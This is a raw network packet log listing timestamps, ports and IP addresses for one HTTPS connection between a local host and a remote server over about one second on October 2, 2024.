Oct 2, 2024 04:28:26.414031982 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.416984081 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.417038918 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.422764063 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.422832966 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.425822020 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.425880909 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.428826094 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.428888083 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.434670925 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.434729099 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.437752008 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.437813044 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.443573952 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.443631887 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.446697950 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.446757078 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.449527025 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.449615002 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.455530882 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.455595016 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.458463907 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.458533049 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.464164972 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.464282036 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.467183113 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.467248917 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.470158100 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.470210075 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.476249933 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.476313114 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.479274988 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.479336977 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.485042095 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.485100985 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.487821102 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.487901926 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.493684053 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.493755102 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.496659994 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.496718884 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.499756098 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.499814034 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.505481005 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.505534887 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.508636951 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.508692980 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.514364004 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.514427900 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.517537117 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.517594099 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.520318031 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.520374060 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.526268005 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.526320934 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.529201984 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.529257059 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.534944057 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.535012960 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.538007975 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.538062096 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.540858984 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.540910006 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.546823978 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.546879053 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.549837112 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.549891949 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.555716991 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.555771112 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.558681011 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.558736086 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.564524889 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.564582109 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.567522049 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.567578077 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.570616007 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.570673943 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.576298952 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.576347113 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.579349041 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.579407930 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.585139036 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.585197926 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.588630915 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.588685989 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.591291904 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.591346025 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.724510908 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.724589109 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.727211952 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.727288961 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.732678890 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.732732058 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.735547066 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.735606909 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.738429070 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.738486052 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.743818045 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.743891954 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.746571064 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.746640921 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.752089024 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.752159119 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.755037069 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.755093098 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.760415077 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.760467052 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.763258934 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.763325930 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.766114950 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.766170979 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.771625996 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.771677971 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.774379015 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.774434090 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.779871941 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.779926062 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.782638073 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.782691956 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.785388947 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.785459995 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.790719032 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.790771008 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.793664932 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.793720961 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.798755884 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.798826933 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.801443100 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.801496029 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.806615114 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.806670904 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.809354067 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.809407949 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.811997890 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.812050104 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.817205906 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.817266941 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.819922924 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.819977999 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.825103045 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.825158119 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.827744007 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.827800035 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.830461025 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.830539942 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.835623980 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.835684061 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.838248014 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.838299036 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.843528032 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.843583107 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.846211910 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.846280098 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.848928928 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.848984003 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.854132891 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.854190111 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.856750965 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.856806040 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.862045050 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.862099886 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.864821911 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.864876032 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.869712114 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.869769096 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.872008085 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.872077942 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.874536037 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.874588013 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.879343987 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.879404068 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.882005930 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.882085085 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.886617899 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.886677027 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.889028072 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.889082909 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.891357899 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.891427994 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.895860910 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.895916939 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.898260117 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.898310900 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.902682066 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.902739048 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.906286955 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.906342983 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.907109022 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.907172918 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.911473989 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.911524057 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.913717985 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.913768053 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.918018103 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.918067932 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.920181036 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.920244932 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.924385071 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.924451113 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.926513910 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.926568031 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.928678989 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.928730011 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.932837963 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.932889938 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.934869051 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.934921026 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.939075947 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.939130068 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.941052914 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.941123009 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:26.943248987 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:26.943303108 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.061753988 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.061841011 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.067223072 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.067287922 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.067825079 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.067898035 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.073236942 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.073287964 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.075361013 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.075418949 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.078109026 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.078166962 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.084542990 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.084620953 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.086538076 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.086657047 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.092524052 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.092592001 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.094841003 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.094907999 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.097559929 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.097676992 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.103101969 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.103168964 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.106508970 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.106579065 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.111358881 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.111433029 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.114233971 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.114294052 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.119715929 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.119785070 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.122546911 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.122596979 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.127996922 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.128056049 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.130587101 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.130642891 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.138695955 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.138762951 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.140944958 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.141005993 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.142685890 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.142740011 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.144299030 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.144347906 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.147320032 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.147368908 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.149038076 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.149092913 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.152152061 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.152226925 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.153774023 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.153865099 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.155363083 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.155417919 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.158477068 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.158530951 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.160145998 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.160206079 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.163271904 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.163331032 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.164892912 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.164954901 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.168165922 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.168215036 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.169722080 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.169776917 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.171205044 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.171256065 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.174323082 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.174386024 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.175946951 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.175997972 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.179073095 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.179121971 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.180682898 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.180732965 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.182276011 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.182328939 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.185291052 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.185340881 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.186906099 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.186960936 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.189976931 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.190028906 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.191581011 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.191637039 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.193172932 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.193229914 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.198034048 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.198081970 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.198451996 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.198502064 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.204070091 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.204112053 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.204133034 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.204148054 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.204163074 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.204194069 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.209539890 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.209589958 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.217525005 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.217597008 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.217643023 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.217693090 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.226392984 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.226435900 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.226444006 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.226457119 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.226490021 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.226510048 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.231050014 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.231108904 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.231286049 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.231339931 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.242295027 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.242358923 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.242374897 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.242417097 CEST	49748	443	192.168.2.4	118.178.60.61
